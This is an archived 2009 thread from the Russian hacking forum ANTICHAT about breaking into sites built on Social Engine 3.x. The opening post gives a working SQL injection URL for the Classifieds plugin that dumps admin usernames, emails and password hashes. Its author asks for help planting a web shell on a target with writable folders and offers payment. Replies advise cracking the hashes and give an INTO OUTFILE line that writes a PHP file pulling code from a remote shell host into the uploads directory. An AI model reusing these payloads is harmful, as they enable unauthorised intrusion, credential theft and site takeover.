ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
Social Engine SQL инекция ! |
18.01.2009, 16:52
|
|
Познающий
Регистрация: 18.01.2008
Сообщений: 31
Провел на форуме:
114816
Репутация:
13
|
|
Social Engine SQL инекция !
В движке Social Engine версия 3.хх на плагине Сlassified есть SQL инекция ! 
Вот sql инекция :
PHP код:
http://sitename.ru/browse_classifieds.php?s=classified_date DESC&v=0&classifiedcat_id=-1+UNION SELECT concat(admin_username,admin_email,0x3a,admin_password)
,2,3+from+se_admins
Как залить шелл ? Помогите друзья !
Вот это скрин таблицы se_admins
CHMOD 777 стоит в папках http://sitename.ru/uploads_user
и на http://sitename.ru/include/smarty/templates_c
Помогите друзья залить ШЕЛЛ кто сможет залить шелл стучите плиз на аску 405-801-351 в долгу не останусь  |
|
|
20.01.2009, 23:35
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
и чё с этой скуль иньекцией мона сделать? ты не разяснил, многим не понятно.
|
|
|
|
21.01.2009, 03:54
|
|
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527
Репутация:
14
|
|
получить хэши, расшифровать их и зайти в админку.
а по заливке шелла так никто и не подскажет?
|
|
|
|
21.01.2009, 03:56
|
|
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686
Репутация:
531
|
|
версия мускула какая
|
|
|
|
21.01.2009, 04:03
|
|
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527
Репутация:
14
|
|
Сообщение от NFM
версия мускула какая
5.0.51a
|
|
|
|
21.01.2009, 04:09
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
/phpMyAdmin => INTO OUTFILE ? (заливка шела в phpmyadmin ищи на форуме более кокретные примеры если требуется. ни раз поднимался вопрос)
Последний раз редактировалось xcedz; 21.01.2009 в 04:12..
|
|
|
|
21.01.2009, 04:15
|
|
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686
Репутация:
531
|
|
https://forum.antichat.ru/threadnav43966-1-10.html
вот здесь почитай про заливку шела
|
|
|
|
21.01.2009, 04:26
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
select '<? @include("http://shell.ru/shell.txt"); ?>' into outfile '/home/blalblalba//uploads_user/shell.php';
File_priv положение вкл
|
|
|
|
21.01.2009, 04:35
|
|
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527
Репутация:
14
|
|
phpmyadmin есть у автора темы.
у меня по его sql-inj есть только доступы к админкам.
где он взял данные по доступу к базе и phpmyadmin я не знаю.
например админка такого сайта:
<вырезано>
как можно туда залить шелл?
Последний раз редактировалось krobol; 21.01.2009 в 04:45..
|
|
|
|
21.01.2009, 04:43
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
попробуй через шаблоны
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
